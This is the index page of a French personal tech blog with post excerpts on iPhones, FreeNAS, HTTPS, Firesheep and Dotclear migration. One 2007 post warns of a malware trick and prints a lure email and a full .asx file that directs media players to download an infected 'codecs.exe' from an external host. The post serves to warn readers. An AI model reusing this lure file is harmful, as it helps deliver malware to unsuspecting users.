Thoms'blognote

Aller au contenu Aller au menu Aller à la recherche

mardi, décembre 30 2014

iBidules, applications offertes et comptes iTunes

Depuis septembre 2013, un certain nombre d'applications sont incluses gratuitement avec les devices Apple. Il est possible d'en profiter et d'en faire profiter d'autres une fois que l'on a compris le fonctionnement.

Lire la suite »

jeudi, août 2 2012

Propriété intellectuelle et création

Cela fait un bon moment que mon blog était à l'abandon. Loin de moi l'idée de publier un billet par jour à partir de maintenant... mais voici tout de même une petite réflexion sur la propriété intellectuelle en 2012.

En début d'été, mon épouse a filmé mon plus jeune fils en train de courir sur la plage. Rien de plus banal. Une fausse manipulation de l'appareil photo a fait que la vidéo a été enregistré au ralenti. Le petit film nous a tant fait pensé au générique d'une série américaine où les femmes courent sur la plage au ralenti en maillot rouge que nous avons bien rigolé. J'ai eu envie de partager ce moment de rigolade avec mes amis. Rien de plus simple. Un coup d'iMovie me permettra d'ajouter le moreau (dument payé) du générique en fond sonore et le tour et joué. Il ne reste plus qu'a partager la vidéo et c'est là que ça se gâte.

Lire la suite »

mercredi, juillet 27 2011

Nabaztag : the end of the road

As you may know, Mindscape has stopped servers hosting Nabaztag services due to financial difficulties the 27 of july 2011. For most Nabaztag this means death. However, some people are trying to create alternatives for the rabbits to survive.

You will find here some of them.

Lire la suite »

vendredi, novembre 12 2010

Firesheep : rien de nouveau, mais ca change tout...

Firesheep est une extension pour Firefox qui a été présentée lors d'une conférence sur la sécurité informatique le 24 octobre 2010 par Eric Butler et Ian Gallagher. Elle fait beaucoup de bruit car, sur un réseau wifi ouvert, elle permet potentiellement de prendre le contrôle de n'importe quelle session ouverte sur un site non sécurisé (non HTTPS). Cela semble être une révolution, une attitude irresponsable de la part des développeurs. En réalité, c'est plus subtile que cela et la démarche vise en fait le contraire de ce que l'on pourrait croire.

Lire la suite »

lundi, juillet 5 2010

Call Forwarding Notification with iPhone and unsupported carrier

A week ago, I sold my old my old iPhone 3G to my brother. His carrier is Base Belgium and does not officially support iPhone. Anytime he got a phone call he had a "Call Forwarding Active" notification. It is mandatory to dismiss the message prior answering the call. This behavior is defined by the default carrier configuration. It is used when you carrier is not officially supported by Apple. You can fix this behavior with a little patience. And, no, you don't need to jailbreak your phone to do this.

Annoying message

Lire la suite »

vendredi, avril 16 2010

Migration de contacts Exchange vers Gmail

Mon téléphone personnel est un iPhone et pour des raisons de commodité de gestion, mes contacts étaient synchronisés sur le serveur Exchange de ma société. Comme je change de travail, Il n'est possible d'utiliser le serveur Exchange de mon entreprise. J'ai donc décidé de migrer la gestion de mes contacts (ainsi que celle de mon calendier) sur mon compte Gmail.

Lire la suite »

mercredi, février 3 2010

Créer une Time Capsule avec Freenas

Depuis la version sa 0.7, Freenas permet de créer des partage pour Mac utilisable pour les sauvegardes avec Time Machine, le logiciel de sauvegarde intégré aux Macs. Ce billet explique comment créer une Timecapsule utilisable par Time Machine à l'aide de Freenas. Ce billet est un peu long, mais ne vous y fiez pas : il contient des informations pour comprendre et les différentes étapes sont détaillées. Les plus pressés pourront aller directement à la pratique.

Lire la suite »

mercredi, décembre 9 2009

Transformer un serveur web HTTP en serveur HTTPS sur debian

J'utilise une application de serveur météo installée sur une machine légère. Son développeur a choisi d'utiliser thttpd sur une plateforme Debian Etch. Ce serveur web est réputé pour sa légèreté et sa rapidité, mais ne supporte pas le HTTPS. Ce n'est pas que l'application soit critique, loin de là, mais le HTTP fait partie de ces protocoles historiques de l'Internet où tout circule en clair. Le danger, c'est que n'importe qui capable d'intercepter la communication en un point du réseau peut récupérer les codes d'accès. Comme l'installation représente une somme certaine de travail, je n'ai pas envie qu'un rigolo se prenant pour un [crack]hacker ne vienne casser l'installation. D'autre part, la mise en place d'un flux chiffré n'est pas difficile. Voici comment faire du HTTPS avec un serveur web qui ne l'intègre pas.

Lire la suite »

vendredi, novembre 27 2009

5 ans deja!

Cela fait 5 ans et 6 jours que j'utilise Dotclear pour ce blognote. Certes, 40 billets en 5 ans cela ne fait pas des masses mais je n'ai jamais été un grand rédacteur. Cela dit, cet anniversaire méritait bien un bien un petit billet.

Merci au créateur de Dotclear, et à l'équipe qui maintient maintenant Dotclear .

Plus d'info sur Dotclear? C'est par ici -> http://fr.dotclear.org/

Doclear 1, puis 2...

Lors d'une évolution arrive parfois que la mécanique interne d'un programme évolue. Dans le cas de dotclear, la gestion des URL a légèrement changé.

Dotclear 1: http://thoms.free.fr/dotclear/index.php?2006/04/20/26-les-rootkit-et-microsoft
Dotclear 2 : http://thoms.free.fr/dotclear/index.php?post/2006/04/20/26-les-rootkit-et-microsoft

Ce tout petit post ajouté dans les adresses a pour effet de casser toutes les références au blog : moteur de recherche, liens sur les sites, etc... que du 404!

Mais heureusement, avec l'aide de Google je me suis aperçu que l'équipe de développement de Dotclear avait pensé à cela.

Vous trouverez donc un plugin nommé dc1redirect à l'adresse suivante http://plugins.dotaddict.org/dc2/details/dc1redirect qui permet de prendre en compte les requêtes concernant vos billets écrits avec Doclear 1.

Une fois le plugin installé, pensez à l'activer dans les paramètres du blog.

mardi, novembre 17 2009

Injection SQL : petite étude de cas

Suite à une actualité professionnelle récente, j'ai été amené à faire l'autopsie d'une attaque par injection SQL sur un serveur web. Cet article détaille le scénario de l'attaque et les techniques utilisées.

Lire la suite »

mardi, septembre 29 2009

iPhone et sa fuite de données personnelles

Ce mardi 29/09/2009, Mac4ever a mis en lumière une fuite de données concernant le numéro de téléphone de l'iPhone.

Voyons dans l'ordre chronologique comment cela s'est passé et de quoi il s'agit.

Lire la suite »

lundi, septembre 21 2009

Bidrivals.com : enchères ou loterie?

Au hasard de mon surf je suis tombé sur un site d'enchère un peu particulier. En fait, je devrais plutôt parler de loterie. Voici pourquoi.

Lire la suite »

vendredi, septembre 4 2009

Nouvelle installation en Dotclear 2

Ca faisait un bon moment que ce blog était un peu moribond, un moment que je n'avais pas touché au moteur du blog (Dotclear), un moment que ... Bref Il était grand temps de faire quelque chose. Je me suis donc décidé à changer le moteur de ce blog avec un Dotclear 2 (2.1.5 pour être précis).

Lire la suite »

mercredi, septembre 5 2007

Résumé ou plagiat ? escrocs d'un genre nouveau

En février dernier, j'écrivais ce billet suite à un mail que j'avais recu dans ma boite mail. Rien de bien transcendant, mais j'ai voulu faire partager mes conclusions à tous de façon à permettre à d'autres de ne pas se faire avoir par des tentatives d'infections d'un genre nouveau.

Lire la suite »

mercredi, avril 18 2007

E61 SFR : Nouveau Firmware 3.0633.09.04

Les possesseurs d'un Nokia E61 le savent, il y a systématiquement une version de retard entre la version du Firmware du modèle standard et celle du modèle SFR. Cela faisait quelques mois qu'on attendais cette version 3.0633.09.04 avec son cortège de corrections. Je ne sais pas si la mise à disposition de cette nouvelle version pour les E61 "brandés" SFR, je ne l'ai vue disponible qu'aujourd'hui.

Lire la suite »

mercredi, mars 21 2007

MSN sur symbian : mauvaise nouvelle

"Désolé, ce service n'est disponible pour le moment en dehors de la Chine, Hong Kong et Taiwan"
Arg! Plus de MSN sur mon E61!

Mauvaise nouvelle pour les chanceux (comme moi) qui avait pu récupérer la MSN fournie par un site Chinois : Après l'avoir testé depuis ma connexion Free.fr hier soir, je reçois systématiquement un message spécifiant que le service n'est accessible que depuis la Chine, Hong Kong et Taiwan.

Quel dommage que le service ne soit pas utilisable partout dans la monde dans les même conditions. C'est même surprenant que le service soit réservé à la Chine, d'ordinaire peu en clin à libérer l'Internet.

Toutefois, le message semble indiquer que tout n'est pas perdu : "Ce service n'est disponible pour le moment"

Il est également possible que cela fonctionne malgré tout car le blocage repose certainement sur la définition des plages d'adresses IP associées aux pays concernées. L'expérience a déjà montré par le passé le peu de fiabilité de ces méthodes de filtrage.

jeudi, mars 8 2007

Dotclear 2.0, Free, MySQL et Cie

EDIT: Ce billet n'est plus d'actualité aujourd'hui (11/09/2009). Voir ce billet.

Avec l'arrivée imminente de Dotclear 2.0, je me suis dit que j'allais essayer cette beta 6 et pourquoi pas migrer définitivement sur dotclear 2.0.

Bon, sur le papier ca l'air super : antispam, tout ca tout ca. En route. Mais je vais vite déchanter. Chez Free.fr - hébergeur de ce blog- il n'est pas possible d'utiliser le moteur de stockage InnoDB. Or celui-ci est requis pour faire tourner Dotclear. Bon bon bon. Depuis l'été dernier, Free a mis à disposition des pages perso la possibilité d'utiliser en lieu et place du serveur MySQL un serveur Postgres. Ca tombe bien, car justement Postgres fonctionne avec Dotclear. Si vous utilisez déjà une base MySQL chez free, le hic c'est que vous devrez renoncer à la base MySQL (et son contenu) pour pouvoir profiter de Postgres. Comme la base MySQL n'est pas utilisée que par Dotclear cela m'obligerai à refaire le tour de tout ce qu'il y a sur ma page perso (genre galerie photo) et la migration vers Postgres n'est pas toujours possible. La seule solution est donc de créer une nouvelle page perso en utilisant Postgres cette fois ci.

Comme je ne voulais pas non plus créer de nouvelle page perso (je sais, je cumule) j'ai fini par m'en sortir en bricolant, mais je n'en suis pas fier pour le moment :-/

Pour faire tourner Dotclear avec free et MySQL, j'ai appliqué des patches pour forcer dotclear à utiliser le moteur de stockage MyISAM. C'est expliqué ici : http://balluche.free.fr/?1051/Installer-DotClear-Beta2-sur-Free Ca fonctionne (bien?) à la condition sine qua non de faire une installation neuve. La migration est impossible (de toutes les façons, c'est déjà assez sale comme ca).

Pour faire une nouvelle installation sur le même compte Free sans shooter mon blog actuel, j'ai juste changé le préfixe des tables dans le fichier de configuration.

Ensuite, j'ai exporté puis importé le blog en utilisant cette procédure : http://doc.dotclear.net/2.0/administration/dc1_vers_dc2 Comme tu le faisais remarquer, j'ai du modifier le fichier de sauvegarde généré par le plugin flat export. Un message de warning en guise d'entête empêchait le fichier d'être reconnu comme un fichier d'import valide...

J'ai bien un dotclear 2.0 qui tourne, mais je n'ai aucune confiance quant la durée de vie de cette installation. Le moteur de stockage MySQL est forcé à MyISAM et il semble que le code de Dotclear ne soit pas prévu pour ca.

Bref, dotclear 2.0, Free et Mysql, pour moi ca sera wait & see pour le moment.

Merci à Gerald et son blog et à Balluche pour leurs conseils.

lundi, février 19 2007

Méthode d'infection virale d'un nouveau genre

Un nouveau mode de propagation de virus utilisant la messagerie est apparu récemment. Il se présente sous la forme d'un message texte relativement quelconque en français et d'une vidéo. Contrairement au méthodes habituelles d'infection, le virus ne transite pas par la messagerie. Le message n'est donc pas stoppé par les équipements habituels de sécurité.

En fait de vidéo, il s'agit d'un fichier .asx. Ces fichiers sont des fichiers de contrôles pour les lecteurs médias (Winmap, Windows Media Player, etc.). Dans ce fichier sont indiqué l'adresse de téléchargement de la vidéo et en cas de besoin l'adresse des codecs nécessaires à la lecture de la vidéo. Lorsque le lecteur télécharge et tente de lire la vidéo, bien entendu des codecs sont nécessaires pour la lecture de celle-ci. Le lecteur va donc interroger l'adresse renseignée dans le .asx pour récupérer les codecs. Or le fichier de codecs est un exécutable infecté par un virus. Le dernier rempart contre l'infection du poste est l'antivirus local (à jour) du poste.

un exemple :

From: "aaa@bbbb.com" <aaa@bbbb.com>
Subject: Anniversaire

C' est le film de mon anniversaire...
Peux tu reconnaître qui est a coté de moi?

Et le fichier vidéo.asx associé

<ASX version="3.0">
	<ENTRY>
		<TITLE>Codec not found</TITLE>
		<REF HREF ="http://updatecodecs.t35.com/video.avi"/>
		<DURATION VALUE="60:00"/>
		<BANNER HREF ="http://updatecodecs.t35.com/img_en.gif">
			<ABSTRACT>Download Codecs</ABSTRACT>
			<MOREINFO HREF ="http://updatecodecs.t35.com/codecs.exe" />
		</BANNER>
	</ENTRY>
</ASX>

Visiblement cet article a inspiré certains. Lisez la suite ici

Billet nombriliste II, le retour des stats

Comme pour l'année 2005, voici quelques chiffres concernant ce blog pour l'année 2006. Comme je m'y prends un peu tard et que les statistiques sont sur un an glissant, il manque les chiffres sur janvier et février 2006.

Vie du blog

Tour à tour, les commentaires puis les trackbacks ont été pris d'assaut par des spammeurs fous vantant les mérites de pilules bleues ou rouges ou encore l'interet de tel ou tel casino en ligne. J'ai du prendre des mesures, parfois draconiennes. Le seul but des ces "barbouillages" comme certains les appellent, est d'augmenter le score des sites vantés dans Google. En effet, la proximité des mots clé et des adresse permet à Google d'améliorer les résultat de vos recherches et cela donne des idées à certains...

Comme à chaque fois pour les chiffre de sites web, les valeurs brutes n'ont que peu de sens. C'est surtout l'évolution de ces chiffres qui est intéressante. Globalement, vous êtes deux fois plus nombreux à visiter ce site que l'année dernière. Mais je ne saurais démêler de manière certaines les visiteurs des spammeurs.

Pour ce qui est des billets consultés, la configuration WAP pour GPRS sur SFR reste un grand classique, puisque ce billet a été consulté environ 6600 fois. Pour les autres, ils sont rarement consultés plus de 1000 fois. On peut citer ceux-ci :

Les mots clés du blog

Conformément aux billets les plus consultés, les principaux mots clé utilisés pour trouver ce site tournent autours de SFR (12%), WAP (5%), configuration (5%), GPRS (4%).

Les navigateurs
  • Explorer Explorer 54.19%
  • Firefox Firefox 32.47%
  • Les autres : 13%
Les Systèmes d'exploitation
  • Windows 90%
  • Linux 4%
  • MacOS 2%
  • Les autres 4%
Indexation

Comme en 2005, Google et Yahoo sont les deux moteurs de recherche qui indexent régulièrement ce blog.

- page 1 de 3